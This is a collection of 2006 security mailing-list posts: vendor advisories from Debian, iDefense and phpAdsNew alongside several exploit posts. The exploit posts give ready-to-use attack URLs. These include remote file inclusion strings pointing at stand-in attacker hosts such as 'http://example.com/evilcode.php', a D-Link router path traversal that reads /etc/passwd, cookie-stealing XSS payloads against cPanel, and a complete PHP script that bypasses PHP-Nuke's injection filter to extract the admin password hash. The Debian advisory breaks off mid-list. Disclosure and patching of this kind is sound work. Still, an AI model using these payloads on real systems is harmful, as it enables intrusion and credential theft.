03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006 and recommends to update to 2.2.1
18-oct-2006 Red-Database-Security published this advisory


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


Smarty-2.6.1 Remote File Include Vulnerabilities

2006-10-23 Thread crackers_child
!WWW.SiBERSAVASCiLAR.COM!


Title : Smarty-2.6.1 Remote File Include Vulnerabilities


#Author: Crackers_Child


[EMAIL PROTECTED]: [EMAIL PROTECTED]




- 
---

Application Download : 
http://smarty.php.net/do_download.php?download_file=Smarty-2.6.14.tar.gz


Bug İn test_cases.php

http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll?




greets:

X_ALPEREN_X and All SiberSavascilar.CoM Members !




- [ WWW.SiBERSAVASCiLAR.COM ] 
--




Flaw in Firefox 2.0 Final

2006-10-23 Thread mike
This flaw reported by Mozilla 
http://www.mozilla.org/security/announce/2006/mfsa2006-59.html
is still unfixed in the latest Firefox 2.0 final.

This exploit works in Firefox 2.0 Final: http://lcamtuf.coredump.cx/ffoxdie.html

"Jonathan Watt and Michal Zalewski independently reported timing dependent 
testcases that trigger crashes at the same place during text display. We have 
seen no demonstration that these crashes could be reliably exploited, but they 
do show evidence of memory corruption so we presume they could be. 
Note: Thunderbird shares the browser engine with Firefox and could be 
vulnerable if JavaScript were to be enabled in mail. This is not the default 
setting and we strongly discourage users from enabling JavaScript in mail."


D-Link DSL-G624T several vulnerabilities

2006-10-23 Thread jose . palanco
D-Link DSL-G624T ADSL Router is vulnerable to several securities.

Directory transversal
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting
Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: "+onmouseover="alert(20102006)


Directory listing
Is possible to list the /cgi-bin directory

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616 

Discovered by:   

José Ramón Palanco: jose.palanco(at)eazel(dot).es

http://www.eazel.es

Original advisory:
http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html


[PHPADSNEW-SA-2006-002] phpAdsNew and phpPgAds 2.0.8-pr1 fix XSS vulnerability

2006-10-23 Thread Matteo Beccati

phpAdsNew / phpPgAds security advisory PHPADSNEW-SA-2006-002

Advisory ID:   PHPADSNEW-SA-2006-002
Date:  2006-Oct-28
Security risk: medium risk
Applications affected: phpAdsNew, phpPgAds
Applications not affected: Max Media Manager v0.1.x - v0.3.x
Versions affected: <= 2.0.8
Versions not affected: >= 2.0.8-pr1




Vulnerability:  HTML injection / Cross-site scripting


Description
---
Some scripts inside the admin interface were displaying parameters
collected by the delivery scripts without proper sanitizing or escaping.
The delivery scripts have public access, while the admin interface is
restricted to logged in users. An attacker could inject HTML/XSS code
which could be displayed/executed in a later time inside the admin
interface.


Solutions
-
- Upgrade to phpAdsNew or phpPgAds 2.0.8-pr1.



Contact informations


The security contact for phpAdsNew and phpPgAds can be reached at:



Best regards
-- 
Matteo Beccati
http://phpadsnew.com
http://phppgads.com



-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==-

2006-10-23 Thread paisterist . nst
/*

[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22

Program: PHP Nuke
Homepage: http://www.php.net
Vulnerable Versions: PHP Nuke <= 7.9
Risk: High!
Impact: Critical Risk

-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection 
vulnerabilities==-
-

- Description
-
PHP-Nuke is a news automated system specially designed to be used in Intranets 
and Internet. The Administrator has total control of his web site, registered 
users, and he will have in the hand a powerful assembly of tools to maintain an 
active and 100% interactive web site using databases.

- Tested
-
localhost & many sites

- Vulnerability Description
-

The most important and critical vulnerability is in the code designed to filter 
the POST inputs to protect the script against
 SQL Injections.


==[ mainfile.php 143-146 ]==
[...]
if (stripos_clone($postString,'%20union%20') OR 
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') 
OR stripos_clone($postString_64,'%20union%20') OR 
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' 
union ') OR stripos_clone($postString_64,'+union+')) {
header("Location: index.php");
die();
}
[...]
==[ end mainfile.php ]==

The protection is very good... but we can bypass it by using something like 
'/**/UNION ' or ' UNION/**/' ;)

Also i found a SQL Injection vulnerability in the Encyclopedia module. The 
"eid" variable isn't filtered at any moment, so if
 we bypass the sql injection protection we can execute arbitrary sql commands. 
With a simple UNION statement we get the 
md5 hash of the admin password.

Here is the real life Proof of Concept exploit.

==Real Proof of Concept exploit==
http://www.neosecurityteam.net

*/

$host="localhost";
$path="/phpnuke/";
$prefix="nuke_";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors 
WHERE '1'='1";

if ($fp) {
$p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
$p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, 
application/x-shockwave-flash, */*\r\n";
$p.="Referer: 
http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n";;
$p.="Accept-Language: es-ar\r\n";
$p.="Content-Type: application/x-www-form-urlencoded\r\n";
$p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$p.="Host: localhost\r\n";
$p.="Content-Length: ".strlen($data)."\r\n";
$p.="Pragma: no-cache\r\n";
$p.="Connection: keep-alive\r\n\r\n";
$p.=$data;

fwrite($fp, $p);

while (!feof($fp)) {
$content .= fread($fp, 4096);
}

preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

print_r($matches);
}
?>
==Real Proof of Concept exploit==

Whit this PoC code i get the md5 hash of the first admin (God) of the 
nuke_authors table.

- How to fix it? More information?


You can found a patch on http://www.neosecurityteam.net/foro/

Also, you can modify the line 143 of mainfile.php, adding one more protection 
like:

==[ mainfile.php old line (143) ]==
[...]
if (stripos_clone($postString,'%20union%20') OR 
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') 
OR stripos_clone($postString_64,'%20union%20') OR 
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' 
union ') OR stripos_clone($postString_64,'+union+')) {
}
[...]
==[ end mainfile.php ]=

==[ mainfile.php new line (143) ]==
[...]
if (stripos_clone($postString,'%20union%20') OR 
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') 
OR stripos_clone($postString_64,'%20union%20') OR 
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' 
union ') OR stripos_clone($postString_64,'+union+') OR 
stripos_clone($postString_64, 
'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
}
[...]
==[ end mainfile.php ]=

That's a momentary solution to the problem. I recommend to download the PHP 
Nuke 8.0 version in the next days... it is not 
free at the moment.

- References

http://www.neosecurityteam.net/index.php?action=advisories&id=27

- Credits

Anti SQL Injection protection bypass by Paisterist -> pai

[SECURITY] [DSA 1197-1] New python2.4 packages fix arbitrary code execution

2006-10-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1197-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
October 22nd, 2006  http://www.debian.org/security/faq
- --

Package: python2.4
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID : CVE-2006-4980
Debian Bug : 391589

Benjamin C. Wiley Sittler discovered that the repr() of the Python 
interpreter allocates insufficient memory when parsing UCS-4 Unicode
strings, which might lead to execution of arbitrary code through
a buffer overflow.

For the stable distribution (sarge) this problem has been fixed in
version 2.4.1-2sarge1. Due to build problems this update lacks fixed
packages for the m68k architecture. Once they are sorted out, binaries
for m68k will be released.

For the unstable distribution (sid) this problem has been fixed in
version 2.4.4-1.

We recommend that you upgrade your Python 2.4 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1.dsc
  Size/MD5 checksum: 1094 c32c8fdbdc8579afa65a35811fd0f447

http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1.diff.gz
  Size/MD5 checksum:  2588405 b06709694f4fd3b04ddd0316403f3528

http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1.orig.tar.gz
  Size/MD5 checksum:  9205762 0475655d5c6f7919fc977c42c1103af8

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/python2.4/idle-python2.4_2.4.1-2sarge1_all.deb
  Size/MD5 checksum:   239606 7bfff5388898e8fa7696f34e59035779

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-doc_2.4.1-2sarge1_all.deb
  Size/MD5 checksum:  3217000 0a26b7cfe7aac553b0f9e5fdd228

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-examples_2.4.1-2sarge1_all.deb
  Size/MD5 checksum:   578596 e789e6a59b4110f986614157d83ac1ec

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:  3610318 cdf1d11305fee01f3eeea87bbae45266

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:  6995312 a00b457959904c463a227389b5ee2d1b

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:  1846778 4200b817da114fbf781d0e2ee7c3f125

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-gdbm_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:27158 c8214711b8b8c020fa6fe1c5b430857d

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-tk_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:   111724 78583460f1f16a560346416dafdd1e97

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:  3644420 f1e366e9de8c4583201db00823e740b0

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:  7596356 656640c35bcf86aef6af768b754191f8

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:  1680266 56874b34d708320d9563bf322c009950

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-gdbm_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:26752 5c432a87748ebf5c1299684a5b995bcf

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-tk_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:   110664 1abaea30247985cecb0f0c394a532bbc

  ARM architecture:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_arm.deb
  Size/MD5 checksum:  3476134 d9122efe777d8782fde2a8ed06db0456

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_arm.deb
  Size/MD5 checksum:  7773024 0cfac06be44113fc5328878559265408

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_arm.deb
  Size/MD5 checksum:  1740512 f2dbd9a91f0168c2a54ff5e85991f797

http://securi

Re: Simple Machines Forum (SMF) XSS issue

2006-10-23 Thread RSnake


I wouldn't rely on that library by itself.  As I emailed Kallahar quite
a while ago about it is still vulnerable to at least one issue:



This works in IE6.0 and Opera 9.0.  What it is doing is converting HTML
entities into their ASCII equivalent.  By doing that he is changing my
string, "	" into "	" which is a newline, and injected
within the javascript directive it breaks it up.  This is a pretty good
example of why conversion filters can be used against you.

-RSnake
http://ha.ckers.org/
http://sla.ckers.org/

On Sat, 21 Oct 2006, [EMAIL PROTECTED] wrote:


Good find on this.

Here is the fix I applied:

Find on line ~85 in Sources/Search.php:

foreach ($temp_params as $i => $data)
{
   @list ($k, $v) = explode('|\'|', $data);
   $context['search_params'][$k] = stripslashes($v);
}


Change to:

foreach ($temp_params as $i => $data)
{
   @list ($k, $v) = explode('|\'|', $data);
   $context['search_params'][$k] = RemoveXSS(stripslashes($v));
}


The RemoveXSS function is taken from the following site:
http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php

I hope that handles all the issue related to this.


AROUNDMe 0.6.9 remonte file inclusion

2006-10-23 Thread noislet . nospam

==
AROUNDMe 0.6.9 remonte file inclusion
vendor site: http://barnraiser.org/
vulnerable versions: 0.6.9 (and possibly older)

discovered by: noislet  ( http://www.noislet.org/ )

vendor informed: 21.10.2006
published: 22.10.2006
==

product info:
AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.

==

bug details:
Input passed to the "$templatePath" is not verified before being used
to include files.

required:
register_globals = On

file:
pol_view.tpl.php (and others)

buggy code:
if (isset($poll)) {
...
include $templatePath . "poll_detail.inc.tpl.php";

==

example exploitation:
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00


--
noislet
   \ page http://www.noislet.org/


PHP Generator of Object SQL Database (path) Remote File Include Vulnerability

2006-10-23 Thread xorontr
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PHP Generator of Object SQL Database (path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!

Ne mutlu türküm diyene

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include $path."/misc/listoption.php3";


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/misc/function.php3?path=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, 
k1tk4t, x_w0x,OG

Tesekkurler: DJR, mdx, R3D4C!D, sakkure, ENTRIKA, ERNE:)

www.milw0rm.com
www.team-rootshell.com
www.cyber-warrior.org
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

script down: http://vidalcharles.free.fr/pgosd/pgosd.tgz

# milw0rm.com [2006-10-22]



WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss Vulnerability

2006-10-23 Thread crackers_child

#
WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss  Vulnerability
 
#

By Crackers_Child

[EMAIL PROTECTED]

www.sibersavacilar.com


#
Exploit
#


site.com:2082/scripts/dosetmytheme?theme=[XssCodes]

site.com:2082/scripts2/editzonetemplate?template=[XssCodes]

#

Examples


site.com:2082/scripts/dosetmytheme?theme=alert(document.cookie)

site.com:2082/scripts2/editzonetemplate?template=alert(document.cookie)

site.com:2082/scripts2/editzonetemplate?template=alert(/HACKED BY 
CRACKERS_CHİLD/)

#

Greetz:All My Friends !

#


### WWW.sibersavascilar.com  ##


speedberg <= 1.2beta1 Remote File Inclusion

2006-10-23 Thread k1tk4t

# speedberg <= 1.2beta1  Remote File Inclusion
# Download Source : http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia   --  #newhack[dot]org @irc.dal.net

file;
entrancePage.tpl.php
generalToolBox.tlb.php
myToolBox.tlb.php
scriplet.inc.php
simplePage.tpl.php
speedberg.class.php
standardPage.tpl.php

exploit;
http://localhost/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell

Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]


XSS in Zwahlen Online Shop

2006-10-23 Thread MC Iglo

Hi list,

there is a XSS in Zwahlen's Online Shop. I can only test the free
version, but i think, other versions may be vulnerable, too.

http://host/article.htm?cat=alert("fix your bugs!")

Kind Regards
MC.Iglo


iDefense Security Advisory 10.21.06: Novell eDirectory evtFilteredMonitorEventsRequest Invalid Free Vulnerability

2006-10-23 Thread iDefense Labs
Novell eDirectory evtFilteredMonitorEventsRequest Invalid Free Vulnerability

iDefense Security Advisory 10.21.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 21, 2006

I. BACKGROUND

Novell eDirectory is a cross-platform lightweight directory access
protocol (LDAP) server. More information can be found on Novell's web
site at http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of an invalid free vulnerability in Novell Inc.'s
eDirectory product could allow an attacker to execute arbitrary code in
the context of the running daemon.

The evtFilteredMonitorEventsRequest function takes an array of objects
that contain an allocated string and two integer values. When an
attacker supplies less objects than is specified by the number of
objects to be sent, an invalid free condition arises. Due to the cleanup
loop being bound by the number supplied within the request rather than
the number actually processed, the free() function will be called on
values on the heap which are outside of the bounds of the allocated
array.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
crash the server or execute arbitrary code. No credentials are required.
Typically this daemon runs with administrator privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested
and found to be vulnerable. Earlier versions are suspected to be
vulnerable.

V. WORKAROUND

It is possible to disable the LDAP service from running via the
ndsmodules.conf file which is usually located in
/etc/opt/novell/eDirectory/conf. However, doing so greatly reduces the
functionality of this program.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1.

You can obtain the Linux/Unix version of this update from their site at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/
The windows version of this update is available at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4510 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/17/2006  Initial vendor notification
08/18/2006  Initial vendor response
10/06/2006  Second vendor notification
10/20/2006  Vendor update released
10/21/2006  Public disclosure

IX. CREDIT

Joshua J. Drake (iDefense Labs) is credited with the discover of this
vulnerability.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




iDefense Security Advisory 10.21.06: Novell eDirectory NCP over IP length Heap Overflow Vulnerability

2006-10-23 Thread iDefense Labs
Novell eDirectory NCP over IP length Heap Overflow Vulnerability

iDefense Security Advisory 10.21.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 21, 2006

I. BACKGROUND

Novell eDirectory is a cross-platform lightweight directory access
protocol (LDAP) server. In addition to LDAP, eDirectory also implements
NCP over IP.  More information can be obtained from the Novell's web
site at http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
eDirectory product could allow an attacker to execute arbitrary code in
the context of the running daemon.

This vulnerability specifically exists within the NCP functionality of
eDirectory.  A specially crafted packet will cause eDirectory to read a
user specified amount of user supplied data into a static sized heap
buffer.  The NCP engine does not verify that the supplied data will fit
inside the allocated heap buffer bounds.  As such, a heap buffer
overflow Curr's.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
crash the server or execute arbitrary code. No credentials are required.
Typically this daemon runs with administrator privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested
and found to be vulnerable. Earlier versions are suspected to be
vulnerable.

V. WORKAROUND

iDefense is unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1.

You can obtain the Linux/Unix version of this update from their site at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/
The windows version of this update is available at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4177 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/16/2006  Initial vendor notification
08/17/2006  Initial vendor response
10/06/2006  Second vendor notification
10/20/2006  Vendor update released
10/21/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




iDefense Security Advisory 10.21.06: Novell eDirectory evtFilteredMonitorEventsRequest Heap Overflow Vulnerability

2006-10-23 Thread iDefense Labs
Novell eDirectory evtFilteredMonitorEventsRequest Heap Overflow
Vulnerability

iDefense Security Advisory 10.21.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 21, 2006

I. BACKGROUND

Novell eDirectory is a cross-platform lightweight directory access
protocol (LDAP) server. More information can be found on Novell's
web site at http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
eDirectory product could allow an attacker to execute arbitrary code in
the context of the running daemon.

This problem stems from an integer overflow that occurs when allocating
memory for attacker supplied data. The evtFilteredMonitorEventsRequest
function takes user input and multiplies it by 16, then adds 16 without
first validating that an integer overflow will not occur. If allocation
succeeds, the function will proceed to loop, filling the memory with
partially controllable input. Since the loop is bounded directly by the
attacker supplied length value, heap overflow will occur.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
crash the server or execute arbitrary code. No credentials are required.
Typically this daemon runs with administrator privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested
and found to be vulnerable. Earlier versions are suspected to be
vulnerable.

V. WORKAROUND

It is possible to disable the LDAP service from running via the
ndsmodules.conf file which is usually located in
/etc/opt/novell/eDirectory/conf. However, doing so greatly reduces the
functionality of this program.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1.

You can obtain the Linux/Unix version of this update from their site at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/
The windows version of this update is available at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4509 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/17/2006  Initial vendor notification
08/18/2006  Initial vendor response
10/06/2006  Second vendor notification
10/20/2006  Vendor update released
10/21/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




IPEER Remote file inclusion

2006-10-23 Thread navairum
Product:http://ipeer.apsc.ubc.ca/ipeer_site/
version: 2.0 (I assume others too)

vulnerability:
http://some_host/ipeer_site/?page=http://evilness/evil.txt?